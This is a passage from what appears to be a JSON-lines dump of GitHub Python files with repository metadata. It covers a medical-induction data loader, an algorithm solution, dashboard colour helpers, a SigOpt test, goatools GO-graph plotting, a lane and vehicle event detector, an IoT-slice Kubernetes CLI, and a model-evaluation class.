IOLDataset:\n def __init__(self, pandas_df, NaN = 999, verbose = False, max_length = 5):\n assert (type(pandas_df) == pd.core.frame.DataFrame), \"only accepts pandas DF objects\"\n self.df = pandas_df\n self.df.replace('NaN', NaN)\n self.patient_num = pandas_df.shape[0]\n self.verbose = verbose\n self.max_length = max_length\n\n '''\n Categorical vector encoding for metadata and outcome\n '''\n def one_hot_encoder(self, categorical_vector, encoded_dict={}):\n class_dict = encoded_dict\n class_index = 0\n index_list = []\n for i in range(len(categorical_vector)):\n if categorical_vector[i] not in class_dict:\n class_dict[categorical_vector[i]] = class_index\n class_index += 1\n index_list.append(class_dict[categorical_vector[i]])\n index_list = np.array(index_list)\n # change the column dimension of the one hot vector to be the same as the class dict\n one_hot_vector = np.zeros((index_list.size, len(class_dict)+1))\n one_hot_vector[np.arange(index_list.size),index_list] = 1\n return one_hot_vector, class_dict\n\n def set_metadata(self, metadata):\n encoded_matrix = []\n if self.verbose:\n print(\"Patient metadata includes: {}\".format(metadata))\n for column in metadata:\n one_hot_matrix, _ = self.one_hot_encoder(self.df[column].values, {})\n encoded_matrix = one_hot_matrix if len(encoded_matrix) == 0 else np.hstack((encoded_matrix, one_hot_matrix))\n if self.verbose:\n print(\"{} | key pair: {}\".format(column, _))\n self.metadata = encoded_matrix\n\n def set_outcome(self, outcome):\n encoded_matrix, _ = self.one_hot_encoder(self.df[outcome].values)\n if self.verbose:\n print(\"Outcome defined by: {}\".format(outcome))\n print(\"{} | key pair: {}\".format(outcome, _))\n self.outcome = encoded_matrix\n\n def set_delivery_time(self):\n self.delivery_time = self.df['Delivery Time'].values\n\n '''\n numpy datetime difference calculation is giving weird values. need to debug.\n '''\n def time_to_delivery(self, current_time):\n assert (type(current_time) == pd.core.series.Series), \"{} is not pandas series\".format(type(current_time))\n return np.array(self.delivery_time - current_time.values, dtype=int)\n\n '''\n Encoding action series\n '''\n def dict_encoder(self, categorical_vector, encoded_dict={}):\n class_dict = encoded_dict\n class_index = 0\n for i in range(len(categorical_vector)):\n if categorical_vector[i] not in class_dict:\n class_dict[categorical_vector[i]] = class_index\n class_index += 1\n return class_dict\n\n def run_dict_encoder(self, actions_to_encode, max_length):\n self.encoded_dict = {}\n for item in actions_to_encode:\n encoded_dict = {}\n for t in range(1, max_length + 1):\n encoded_dict = self.dict_encoder(self.df[item + str(t)].values, encoded_dict)\n self.encoded_dict[item] = encoded_dict\n\n def set_induction_action(self, action_series):\n base = action_series[1:]\n self.induction_series = {}\n # iterate through all time points for each action base to create a dict with complete encodings\n self.run_dict_encoder(actions_to_encode = base, max_length = self.max_length)\n # iterate through time points to gather encodings and combien with time to delivery\n for t in range(1, self.max_length + 1):\n time_to_delivery = self.time_to_delivery(self.df[action_series[0] + str(t)])\n encoded_matrix = np.expand_dims(time_to_delivery, axis = 1) # make column vector\n for item in base:\n one_hot_matrix, _ = self.one_hot_encoder(self.df[item + str(t)].values, self.encoded_dict[item])\n encoded_matrix = np.hstack((encoded_matrix, one_hot_matrix))\n self.induction_series[t] = encoded_matrix\n if self.verbose:\n print(\"Induciton actions include: {}\".format(base))\n print(\"Key pair: {}\".format(self.encoded_dict))\n\n '''\n Create dataset that rolls out the time points with one hot vector encodings and appropritate labels\n '''\n def create_dataset(self, bishop_included = True):\n self.set_metadata(['Age', 'Ethnicity category', 'Gravida', 'Parity']) # 'Current_Pregnancy_Concerns'\n self.set_outcome('Mode of Delivery')\n self.set_delivery_time()\n self.set_induction_action(['T', 'Indication', 'Action', 'PriorROM', 'Bishop'] if bishop_included else ['T', 'Indication', 'Action', 'PriorROM'])\n dataset = []\n for t in range(1, self.max_length + 1):\n action = self.induction_series[t][:,1:]\n time_to_delivery = self.induction_series[t][:,0]\n accumulated_action = action if t == 1 else accumulated_action + action\n # The above addition doesn't work cause different induction time points have\n # different number of classes, but i didn't consider that when coding the one_hot_encodings...\n # need to debug. FFS -woochan\n for patient_id in range(self.patient_num):\n dataset.append({'id':{'patient_id':patient_id, 'series':t},\n 'metadata':self.metadata[patient_id],\n 'action':accumulated_action[patient_id],\n 'time_to_delivery':time_to_delivery[patient_id],\n 'outcome':self.outcome[patient_id]})\n return dataset\n\n\n\nclass DataLoader:\n def __init__(self, dataset):\n self.dataset = dataset\n\n def __getitem__(self, index):\n return\n\n def __len__(self):\n return self.dataset_size\n","repo_name":"woochan-hwang/IOL_project","sub_path":"dataLoader.py","file_name":"dataLoader.py","file_ext":"py","file_size_in_byte":6039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9336469978","text":"n, m = map(int, input().split())\narr = list(map(int, input().split()))\ncur = 0\nres = [i for i in range(1, n+1)]\ncount = 0\n\nfor i in arr:\n if len(res)==1:\n break\n tmp = res.index(i)\n if tmp >= cur:\n count += tmp - cur if tmp - cur < len(res) - tmp + cur else len(res) - tmp + cur\n else:\n count += cur - tmp if cur - tmp < len(res) - cur + tmp else len(res) - cur + tmp\n cur = tmp\n del res[cur]\n\nprint(count)","repo_name":"ChoiSangwon/algorithm","sub_path":"backjoon/1021.py","file_name":"1021.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15105866181","text":"\"\"\"This file is like a short engine.\nThe main purpose is to store all required functions, to prevent the app.py\nto be filled with spam \"\"\"\n\nimport math\nimport numpy as np\n\n\n\"\"\"------------------------------------------------------------\"\"\"\n\"\"\"-Everything that belongs taxa coloring or color generation.-\"\"\"\n\"\"\"------------------------------------------------------------\"\"\"\n\n\ndef rgbStrToVec(color):\n \"\"\" Converts a hex color code string into a numpy 3 vector.\n :param color: Color code string. An example would be \"#1A05FF\".\n :return: Returns a numpy 3 vector with red green and blue value.\n \"\"\"\n try:\n return np.array([int(\"0x\" + color[1:3], 16),\n int(\"0x\" + color[3:5], 16),\n int(\"0x\" + color[5:7], 16)])\n except ... as error:\n print(\"Error: required_functionalities->rgbStrToVec():\", error)\n return np.array([0, 0, 0])\n\n\ndef rgbVecToStr(c_vec):\n \"\"\" Converts a numpy 3 vector within int variables into a rbg hex color\n code string.\n :param c_vec: Numpy 3 vector within int variables between 0 and 255.\n :return: Returns a string with a hex color code.\n \"\"\"\n try:\n\n if c_vec[0] < 0: c_vec[0] = 0;\n if c_vec[0] > 255: c_vec[0] = 255;\n\n if c_vec[1] < 0: c_vec[1] = 0;\n if c_vec[1] > 255: c_vec[1] = 255;\n\n if c_vec[2] < 0: c_vec[2] = 0;\n if c_vec[2] > 255: c_vec[2] = 255;\n\n return \"#\" + str(hex(c_vec[0]))[2:4].zfill(2) + \\\n str(hex(c_vec[1]))[2:4].zfill(2) + \\\n str(hex(c_vec[2]))[2:4].zfill(2)\n except ... as error:\n print(\"Error: required_functionalities->rgbVecToStr()\", error)\n return \"#000000\"\n\n\ndef colorRampPalette(colors, n):\n \"\"\" Interpolate colors linearly to create a color palette.\n :param colors: List with color hex strings which is based on.\n :param n: Number of required colors. That effects the greatness\n of return list.\n :return: Gives a list with hex color strings.\n \"\"\"\n result = []\n c_len = len(colors)\n if c_len < 1:\n return []\n if c_len == 1:\n return colors * n\n if n == 1:\n return [colors[0]]\n\n step = (len(colors) - 1) / (n - 1)\n for i in range(0, n):\n if math.floor(step * i) == math.ceil(step * i):\n result.append(colors[math.floor(step * i)])\n else:\n v_color_a = rgbStrToVec(colors[math.floor(step * i)])\n v_color_b = rgbStrToVec(colors[math.ceil(step * i)])\n\n v_color = (v_color_a + (v_color_b - v_color_a) *\n (step * i % 1)).astype(int)\n result.append(rgbVecToStr(v_color))\n\n return result\n\n\ndef qualitativeColours(n, color_root=None):\n \"\"\" Generates a color palette in order to be able to differentiate between\n individual taxa as well as possible.\n :param n: Number of required colors.\n :param color_root a color hex string, which define the pole label color.\n :return: Gives a list with hex color strings.\n \"\"\"\n defauld_root = [\"#DF0101\", \"#FFFF00\", \"#298A08\", \"#00FF00\", \"#01DFD7\", \"#0101DF\", \"#F781BE\"]\n\n if color_root:\n try:\n color_root = color_root.split()\n\n # Simply data check, not valid against none hex letters.\n for i in color_root:\n if len(i) != 7 or i[0] != '#':\n print(\"Error: required_functionalities->qualitiveColours: \", \"ValueError: not a hex color string.\")\n color_root = defauld_root\n break\n\n except ... as e:\n print(\"Error: required_functionalities->qualitiveColours: \", e)\n color_root = defauld_root\n else:\n color_root = defauld_root\n\n return colorRampPalette(color_root, n)\n\n\ndef set_custom_color_traces(fig, custom_d_index):\n \"\"\" Manual update_traces() function for python dash figure,\n witch is simply write a custom variable into the marker color.\n This function is just a specific bug solution and only usable with\n Scatter3d traces.\n :param fig: Python dash scatter_3d figure witch should be updated.\n :param custom_d_index: Index of custom variable in the corresponding trace.\n Effects something like %customdata[i].\n :return: All updates are by reference, hence it returns void.\n \"\"\"\n for trace in fig.data:\n try:\n trace['marker']['color'] = trace['customdata'][0][custom_d_index]\n except ... as error:\n print(\"Error: required_functionalities->updateColorTraces:\", error)\n\n\n","repo_name":"lukekoch/taXaminer-dashboard-g-nom","sub_path":"utility/required_functionalities.py","file_name":"required_functionalities.py","file_ext":"py","file_size_in_byte":4567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"43605375218","text":"import os\n\nimport pytest\nfrom mock import Mock, patch\n\nfrom sigopt.orchestrate.sigopt.service import SigOptService\n\n\nclass TestSigOptService(object):\n @pytest.fixture\n def services(self):\n return Mock()\n\n def test_reads_from_environment(self, services):\n with patch.dict(\n os.environ,\n dict(SIGOPT_API_TOKEN=\"foobar\", SIGOPT_API_URL=\"https://api-env.sigopt.com\"),\n ):\n sigopt_service = SigOptService(services)\n assert sigopt_service.conn is not None\n assert sigopt_service.api_token == \"foobar\"\n assert sigopt_service.api_url == \"https://api-env.sigopt.com\"\n","repo_name":"sigopt/sigopt-python","sub_path":"test/orchestrate/sigopt/service_test.py","file_name":"service_test.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"68"} +{"seq_id":"17839600321","text":"\"\"\"Plot a GODagSmall.\"\"\"\n\n__copyright__ = \"Copyright (C) 2016-2018, DV Klopfenstein, H Tang, All rights reserved.\"\n__author__ = \"DV Klopfenstein\"\n\nimport sys\nimport os\nimport collections as cx\nfrom collections import OrderedDict\nfrom goatools.godag_obosm import OboToGoDagSmall\n\ndef plot_gos(fout_png, goids, obo_dag, *args, **kws):\n \"\"\"Given GO ids and the obo_dag, create a plot of paths from GO ids.\"\"\"\n engine = kws['engine'] if 'engine' in kws else 'pydot'\n godagsmall = OboToGoDagSmall(goids=goids, obodag=obo_dag).godag\n godagplot = GODagSmallPlot(godagsmall, *args, **kws)\n godagplot.plt(fout_png, engine)\n\ndef plot_goid2goobj(fout_png, goid2goobj, *args, **kws):\n \"\"\"Given a dict containing GO id and its goobj, create a plot of paths from GO ids.\"\"\"\n engine = kws['engine'] if 'engine' in kws else 'pydot'\n godagsmall = OboToGoDagSmall(goid2goobj=goid2goobj).godag\n godagplot = GODagSmallPlot(godagsmall, *args, **kws)\n godagplot.plt(fout_png, engine)\n\ndef plot_results(fout_png, goea_results, *args, **kws):\n \"\"\"Given a list of GOEA results, plot result GOs up to top.\"\"\"\n if \"{NS}\" not in fout_png:\n plt_goea_results(fout_png, goea_results, *args, **kws)\n else:\n # Plot separately by NS: BP, MF, CC\n ns2goea_results = cx.defaultdict(list)\n for rec in goea_results:\n ns2goea_results[rec.NS].append(rec)\n for ns_name, ns_res in ns2goea_results.items():\n png = fout_png.format(NS=ns_name)\n plt_goea_results(png, ns_res, *args, **kws)\n\ndef plt_goea_results(fout_png, goea_results, *args, **kws):\n \"\"\"Plot a single page.\"\"\"\n engine = kws['engine'] if 'engine' in kws else 'pydot'\n godagsmall = OboToGoDagSmall(goea_results=goea_results).godag\n godagplot = GODagSmallPlot(godagsmall, *args, goea_results=goea_results, **kws)\n godagplot.plt(fout_png, engine)\n\nclass GODagPltVars(object):\n \"\"\"Holds plotting paramters.\"\"\"\n\n # http://www.graphviz.org/doc/info/colors.html\n rel2col = {\n 'is_a': 'black',\n 'part_of': 'blue',\n 'regulates': 'gold',\n 'positively_regulates': 'green',\n 'negatively_regulates': 'red',\n 'occurs_in': 'aquamarine4',\n 'capable_of': 'dodgerblue',\n 'capable_of_part_of': 'darkorange',\n }\n\n alpha2col = OrderedDict([\n # GOEA GO terms that are significant\n (0.005, 'mistyrose'),\n (0.010, 'moccasin'),\n (0.050, 'lemonchiffon1'),\n # GOEA GO terms that are not significant\n (1.000, 'grey95'),\n ])\n\n key2col = {\n 'level_01': 'lightcyan',\n 'go_sources': 'palegreen',\n }\n\n fmthdr = \"{GO} L{level:>02} D{depth:>02}\"\n fmtres = \"{study_count} genes\"\n # study items per line on GO Terms:\n items_p_line = 5\n\n\nclass GODagSmallPlot(object):\n \"\"\"Plot a graph contained in an object of type GODagSmall .\"\"\"\n\n def __init__(self, godagsmall, *args, **kws):\n self.args = args\n self.log = kws['log'] if 'log' in kws else sys.stdout\n self.title = kws['title'] if 'title' in kws else None\n # GOATOOLs results as objects\n self.go2res = self._init_go2res(**kws)\n # GOATOOLs results as a list of namedtuples\n self.pval_name = self._init_pval_name(**kws)\n # Gene Symbol names\n self.id2symbol = kws['id2symbol'] if 'id2symbol' in kws else {}\n self.study_items = kws['study_items'] if 'study_items' in kws else None\n self.study_items_max = self._init_study_items_max()\n self.alpha_str = kws['alpha_str'] if 'alpha_str' in kws else None\n self.pltvars = kws['GODagPltVars'] if 'GODagPltVars' in kws else GODagPltVars()\n if 'items_p_line' in kws:\n self.pltvars.items_p_line = kws['items_p_line']\n self.dpi = kws['dpi'] if 'dpi' in kws else 150\n self.godag = godagsmall\n self.goid2color = self._init_goid2color()\n self.pydot = None\n\n def _init_study_items_max(self):\n \"\"\"User can limit the number of genes printed in a GO term.\"\"\"\n if self.study_items is None:\n return None\n if self.study_items is True:\n return None\n if isinstance(self.study_items, int):\n return self.study_items\n return None\n\n @staticmethod\n def _init_go2res(**kws):\n \"\"\"Initialize GOEA results.\"\"\"\n if 'goea_results' in kws:\n return {res.GO:res for res in kws['goea_results']}\n if 'go2nt' in kws:\n return kws['go2nt']\n\n @staticmethod\n def _init_pval_name(**kws):\n \"\"\"Initialize pvalue attribute name.\"\"\"\n if 'pval_name' in kws:\n return kws['pval_name']\n if 'goea_results' in kws:\n goea = kws['goea_results']\n if goea:\n return \"p_{M}\".format(M=goea[0].method_flds[0].fieldname)\n\n def _init_goid2color(self):\n \"\"\"Set colors of GO terms.\"\"\"\n goid2color = {}\n # 1. colors based on p-value override colors based on source GO\n if self.go2res is not None:\n alpha2col = self.pltvars.alpha2col\n pval_name = self.pval_name\n for goid, res in self.go2res.items():\n pval = getattr(res, pval_name, None)\n if pval is not None:\n for alpha, color in alpha2col.items():\n if pval <= alpha and res.study_count != 0:\n if goid not in goid2color:\n goid2color[goid] = color\n # 2. GO source color\n color = self.pltvars.key2col['go_sources']\n for goid in self.godag.go_sources:\n if goid not in goid2color:\n goid2color[goid] = color\n # 3. Level-01 GO color\n color = self.pltvars.key2col['level_01']\n for goid, goobj in self.godag.go2obj.items():\n if goobj.level == 1:\n if goid not in goid2color:\n goid2color[goid] = color\n return goid2color\n\n def plt(self, fout_img, engine=\"pydot\"):\n \"\"\"Plot using pydot, graphviz, or GML.\"\"\"\n if engine == \"pydot\":\n self._plt_pydot(fout_img)\n elif engine == \"pygraphviz\":\n raise Exception(\"TO BE IMPLEMENTED SOON: ENGINE pygraphvis\")\n else:\n raise Exception(\"UNKNOWN ENGINE({E})\".format(E=engine))\n\n # ----------------------------------------------------------------------------------\n # pydot\n def _plt_pydot(self, fout_img):\n \"\"\"Plot using the pydot graphics engine.\"\"\"\n dag = self._get_pydot_graph()\n img_fmt = os.path.splitext(fout_img)[1][1:]\n dag.write(fout_img, format=img_fmt)\n self.log.write(\" {GO_USR:>3} usr {GO_ALL:>3} GOs WROTE: {F}\\n\".format(\n F=fout_img,\n GO_USR=len(self.godag.go_sources),\n GO_ALL=len(self.godag.go2obj)))\n\n def _get_pydot_graph(self):\n \"\"\"Given a DAG, return a pydot digraph object.\"\"\"\n rel = \"is_a\"\n pydot = self._get_pydot()\n # Initialize empty dag\n dag = pydot.Dot(label=self.title, graph_type='digraph', dpi=\"{}\".format(self.dpi))\n # Initialize nodes\n go2node = self._get_go2pydotnode()\n # Add nodes to graph\n for node in go2node.values():\n dag.add_node(node)\n # Add edges to graph\n rel2col = self.pltvars.rel2col\n for src, tgt in self.godag.get_edges():\n dag.add_edge(pydot.Edge(\n go2node[tgt], go2node[src],\n shape=\"normal\",\n color=rel2col[rel],\n dir=\"back\")) # invert arrow direction for obo dag convention\n return dag\n\n def _get_go2pydotnode(self):\n \"\"\"Create pydot Nodes.\"\"\"\n go2node = {}\n for goid, goobj in self.godag.go2obj.items():\n txt = self._get_node_text(goid, goobj)\n fillcolor = self.goid2color.get(goid, \"white\")\n node = self.pydot.Node(\n txt,\n shape=\"box\",\n style=\"rounded, filled\",\n fillcolor=fillcolor,\n color=\"mediumseagreen\")\n go2node[goid] = node\n return go2node\n\n def _get_pydot(self):\n \"\"\"Return pydot package. Load pydot, if necessary.\"\"\"\n if self.pydot:\n return self.pydot\n self.pydot = __import__(\"pydot\")\n return self.pydot\n\n # ----------------------------------------------------------------------------------\n # Methods for text printed inside GO terms\n def _get_node_text(self, goid, goobj):\n \"\"\"Return a string to be printed in a GO term box.\"\"\"\n txt = []\n # Header line: \"GO:0036464 L04 D06\"\n txt.append(self.pltvars.fmthdr.format(\n GO=goobj.id.replace(\"GO:\", \"GO\"),\n level=goobj.level,\n depth=goobj.depth))\n # GO name line: \"cytoplamic ribonucleoprotein\"\n name = goobj.name.replace(\",\", \"\\n\")\n txt.append(name)\n # study info line: \"24 genes\"\n study_txt = self._get_study_txt(goid)\n if study_txt is not None:\n txt.append(study_txt)\n # return text string\n return \"\\n\".join(txt)\n\n def _get_study_txt(self, goid):\n \"\"\"Get GO text from GOEA study.\"\"\"\n if self.go2res is not None:\n res = self.go2res.get(goid, None)\n if res is not None:\n if self.study_items is not None:\n return self._get_item_str(res)\n else:\n return self.pltvars.fmtres.format(\n study_count=res.study_count)\n\n def _get_item_str(self, res):\n \"\"\"Return genes in any of these formats:\n 1. 19264, 17319, 12520, 12043, 74131, 22163, 12575\n 2. Ptprc, Mif, Cd81, Bcl2, Sash3, Tnfrsf4, Cdkn1a\n 3. 7: Ptprc, Mif, Cd81, Bcl2, Sash3...\n \"\"\"\n npl = self.pltvars.items_p_line # Number of items Per Line\n prt_items = sorted([self.__get_genestr(itemid) for itemid in res.study_items])\n prt_multiline = [prt_items[i:i+npl] for i in range(0, len(prt_items), npl)]\n num_items = len(prt_items)\n if self.study_items_max is None:\n genestr = \"\\n\".join([\", \".join(str(e) for e in sublist) for sublist in prt_multiline])\n return \"{N}) {GENES}\".format(N=num_items, GENES=genestr)\n else:\n if num_items <= self.study_items_max:\n strs = [\", \".join(str(e) for e in sublist) for sublist in prt_multiline]\n genestr = \"\\n\".join([\", \".join(str(e) for e in sublist) for sublist in prt_multiline])\n return genestr\n else:\n short_list = prt_items[:self.study_items_max]\n short_mult = [short_list[i:i+npl] for i in range(0, len(short_list), npl)]\n short_str = \"\\n\".join([\", \".join(str(e) for e in sublist) for sublist in short_mult])\n return \"\".join([\"{N} genes; \".format(N=num_items), short_str, \"...\"])\n\n def __get_genestr(self, itemid):\n \"\"\"Given a geneid, return the string geneid or a gene symbol.\"\"\"\n if self.id2symbol is not None:\n symbol = self.id2symbol.get(itemid, None)\n if symbol is not None:\n return symbol\n if isinstance(itemid, int):\n return str(itemid)\n return itemid\n\n# Copyright (C) 2016-2018, DV Klopfenstein, H Tang, All rights reserved.\n","repo_name":"tanghaibao/goatools","sub_path":"goatools/godag_plot.py","file_name":"godag_plot.py","file_ext":"py","file_size_in_byte":11480,"program_lang":"python","lang":"en","doc_type":"code","stars":671,"dataset":"github-code","pt":"68"} +{"seq_id":"29807087398","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nimport glob\nimport os, signal, queue\n\nfrom lanenetdet.config import global_config\nfrom lanenetdet.lanenet_model import lanenet\n\nfrom run_efficientdet import effdet\n\nfrom module.functions import*\nfrom module.object_Tracker import Object_Tracker\nfrom module.line_Tracker import LineTracker\nfrom module.event_Classifier import EventClassifier\n\nclass Event_Detector:\n\n def __init__(self):\n # setup Tracker objects\n self.ot = Object_Tracker()\n self.lt = LineTracker()\n self.ec = EventClassifier(object_Tracker=self.ot, line_Tracker=self.lt)\n self.gpath = \"C:/FusionData/5A/ClassEvent_IHM\"\n\n def detect_events(self, action_interface, stop_process_queue, videoFolderPath, flag_crossing, flag_acc, flag_cico, flag_cut):\n # Set sess configuration / init lanenet\n sess_config = tf.ConfigProto()\n CFG = global_config.cfg\n sess_config.gpu_options.per_process_gpu_memory_fraction = CFG.TEST.GPU_MEMORY_FRACTION\n sess_config.gpu_options.allow_growth = CFG.TRAIN.TF_ALLOW_GROWTH\n sess_config.gpu_options.allocator_type = 'BFC'\n\n sess = tf.Session(config=sess_config)\n lane_frame_width = 720 # lanenet input size\n lane_frame_height = 256 # lanenet input size\n\n with sess.as_default():\n input_tensor = tf.placeholder(dtype=tf.float32, shape=[1, lane_frame_height, lane_frame_width, 3], name='input_tensor')\n net = lanenet.LaneNet(phase='test', net_flag='vgg')\n binary_seg_ret, instance_seg_ret = net.inference(input_tensor=input_tensor, name='lanenet_model')\n saver = tf.train.Saver()\n saver.restore(sess=sess, save_path= self.gpath + \"/lanenetdet/model/tusimple_lanenet_vgg.ckpt\") # C:/Tools/Python37/Lib/lanenetdet/model/tusimple_lanenet_vgg.ckpt\n\n # init efficientdet\n efficient_det = effdet(self.gpath)\n vid_folders = glob.glob(videoFolderPath + \"/*\")\n for vid in vid_folders:\n vidname = vid.split(\"\\\\\")[-1]\n print(\"Processing file : \" + vidname)\n vidonlyname = vidname.split(\".\")[0]\n cap = cv2.VideoCapture(vid)\n self.fps = cap.get(cv2.CAP_PROP_FPS) # raw is 25 fps\n total_frame = cap.get(cv2.CAP_PROP_FRAME_COUNT)\n frame_width = 720 # after maskframe\n frame_height = 255 # after maskframe\n frame_count = 0\n while (cap.isOpened()):\n ret, frame = cap.read()\n if ret == True:\n rects = list()\n frame_count += 1\n frame = maskframe(frame) # raw image is 720x576, output is 720x350\n # efficientdet\n if (frame_count-1) % 2 == 0 or frame_count == 1:\n action_interface.affichage(frame_count, total_frame)\n detections = efficient_det.detect_image(frame) # ymin, xmin, ymax, xmax frame[80:, 150:550]\n for detect in detections:\n if detect[6] in [3, 4, 6, 8]: # car, motorcycle, bus, truck\n rects.append(detect) # (?, ymin, xmin, ymax, xmax, %, class)\n # Object Tracking \n objects = self.ot.update(rects, self.lt.lines)\n if len(objects) > 0:\n new_frame = efficient_det.draw_objects(frame, np.array(list(objects.values())), track_ids=list(objects.keys()))\n else: \n new_frame = frame\n\n # lanenet \n frame = cv2.resize(frame, (lane_frame_width, lane_frame_height), interpolation=cv2.INTER_LINEAR)\n frame = frame / 127.5 - 1.0\n with sess.as_default():\n binary_seg_image, instance_seg_image = sess.run(\n [binary_seg_ret, instance_seg_ret],\n feed_dict={input_tensor: [frame]}\n )\n if binary_seg_image is not None:\n # Compute lines for each step\n output, right_lane, left_lane = self.lt.update(binary_seg_image[0], new_frame)\n self.ec.update(vidonlyname, frame_count, flag_acc, flag_cico, flag_crossing, flag_cut)\n # Frames are read by intervals of 10 milliseconds. The programs breaks out of the while loop when the user presses the 'q' key\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n try:\n stop_process = stop_process_queue.get(timeout=1)\n if stop_process:\n sess.close()\n action_interface.register_Event(self.ec.hist_event)\n print(\"=== FIN de l'analyse vidéo ===\")\n return\n except queue.Empty:\n pass\n else:\n break\n # The following frees up ressources and closes all windows\n cap.release()\n print(\"FIN DE LA LECTURE VIDEO\")\n action_interface.register_Event(self.ec.hist_event)\n sess.close()","repo_name":"MrzAtn/FDD","sub_path":"event_detector.py","file_name":"event_detector.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15549977178","text":"\"\"\"\niotorch iotslice\n\n Usage:\n iotorch iotslice create --name= --edge= --cloud= [--configfile=] \n iotorch iotslice [get|delete] --name= [--configfile=]\n iotorch iotslice list [--configfile=]\n\n\"\"\"\nfrom json import dumps\n\nfrom .base import Base\n\nfrom docopt import docopt\n\nfrom ..utils import k8sutils\n\nimport toml\n\nimport os\n\nclass Iotslice(Base):\n \"\"\"The IoT Slice command.\"\"\"\n\n def create(self):\n\n config_path = self.options['--configfile']\n\n if (not config_path):\n config_path='./iotorch.toml'\n\n iotslicename = self.options['--name']\n edgeclustername = self.options['--edge']\n cloudclustername = self.options['--cloud']\n\n sliceparams = {'edge':edgeclustername,'cloud':cloudclustername}\n\n iotslice = {iotslicename:sliceparams}\n\n config = {}\n\n iotslices = iotslice\n\n if not os.path.exists(config_path):\n print('Clusters do not exist')\n return\n\n with open(config_path,'r') as f:\n config = toml.load(f)\n f.close\n if config.get('iotslices') != None:\n iotslices = config['iotslices']\n iotslices.update(iotslice)\n\n clusters = config.get('k8sclusters')\n \n if clusters == None:\n print('Clusters do not exist')\n return\n\n edge = clusters.get(edgeclustername)\n\n if edge == None:\n print('Edge cluster does not exist')\n return\n\n cloud = clusters.get(cloudclustername)\n\n if cloud == None:\n print('Cloud cluster does not exist')\n return\n\n if not k8sutils.createnamespace(iotslicename,edgeclustername,config_path):\n print('Iot Slice not created in Edge Cluster')\n return\n\n if edgeclustername != cloudclustername:\n if not k8sutils.createnamespace(iotslicename,cloudclustername,config_path):\n print('Iot Slice not created in Cloud Cluster')\n return\n\n config.update({'iotslices':iotslices})\n with open(config_path,'w+') as f:\n toml.dump(config,f)\n\n print('IoT Slice %s created' %iotslicename)\n\n def delete(self):\n\n config_path = self.options['--configfile']\n\n if (not config_path):\n config_path='./iotorch.toml'\n\n if not os.path.exists(config_path):\n print('Nothing to delete')\n return\n\n iotslicename = self.options['--name']\n\n config = {}\n with open(config_path,'r') as f:\n config = toml.load(f)\n f.close\n\n if config.get('iotslices') == None:\n print('Nothing to delete')\n return\n\n iotslices = config.pop('iotslices')\n\n if iotslices.get(iotslicename) == None:\n print('Nothing to delete')\n return\n\n iotslice = iotslices.pop(iotslicename)\n\n edgeclustername = iotslice.get('edge')\n cloudclustername = iotslice.get('cloud')\n\n if not k8sutils.deletenamespace(iotslicename,edgeclustername,config_path):\n print('Iot Slice not deleted in Edge Cluster')\n return\n\n if edgeclustername != cloudclustername:\n if not k8sutils.deletenamespace(iotslicename,cloudclustername,config_path):\n print('Iot Slice not created in Cloud Cluster')\n return\n\n config.update({'iotslices':iotslices})\n\n with open(config_path,'w+') as f:\n toml.dump(config,f)\n\n print('IoT Slice %s deleted' %iotslicename)\n\n def get(self):\n \n config_path = self.options['--configfile']\n\n if (not config_path):\n config_path='./iotorch.toml'\n\n if not os.path.exists(config_path):\n print('Nothing to get')\n else:\n with open(config_path) as f:\n config = toml.load(f)\n slices = config.get('iotslices')\n if slices == None:\n print('Nothing to get')\n return\n iotslice = slices.get(self.options['--name'])\n if iotslice == None:\n print('Nothing to get')\n else:\n print(iotslice)\n\n def list(self):\n\n config_path = self.options['--configfile']\n\n if (not config_path):\n config_path='./iotorch.toml'\n\n if not os.path.exists(config_path):\n print('Nothing to list')\n else:\n with open(config_path) as f:\n config = toml.load(f)\n slices = config.get('iotslices')\n if slices == None:\n print('Nothing to list')\n else:\n print (list(slices.keys()))\n\n\n def run(self):\n\n options = docopt(__doc__)\n\n if options['create']:\n self.options=options\n self.create()\n elif options['delete']:\n self.options=options\n self.delete()\n elif options['get']:\n self.options=options\n self.get()\n elif options['list']:\n self.options=options\n self.list()\n else:\n print(\"Option not implemented\")\n raise NotImplementedError('Option not implemented')\n","repo_name":"juanmagal/iot-slice-orchestrator","sub_path":"iotorch/commands/iotslice.py","file_name":"iotslice.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"71123378457","text":"from inspect import signature\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import export_graphviz\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\n\r\nimport graphviz\r\n\r\nfrom xml.etree import ElementTree as ET\r\nfrom IPython.display import display, SVG\r\n\r\nfrom .utils import display_svg_with_zoom\r\n\r\nfrom io import BytesIO\r\nfrom PIL import Image\r\n\r\nsns.set_theme()\r\n\r\nclass ModelEvaluator:\r\n def __init__(self, X, y, hyperparameters, test_size=0.2, random_state=42):\r\n \"\"\"\r\n X: features dataframe\r\n y: target series/dataframe\r\n hyperparameters: dictionary of hyperparameters for models\r\n test_size: proportion of the dataset to include in the test split\r\n \"\"\"\r\n self.X, self.encoders = self._label_encode_dataframe(X)\r\n self.y = y\r\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.X, self.y, test_size=test_size, random_state=random_state)\r\n self.hyperparameters = hyperparameters\r\n self.models = {}\r\n self.predictions = {}\r\n self.confusion_matrices = {}\r\n self.feature_importances = {}\r\n \r\n def 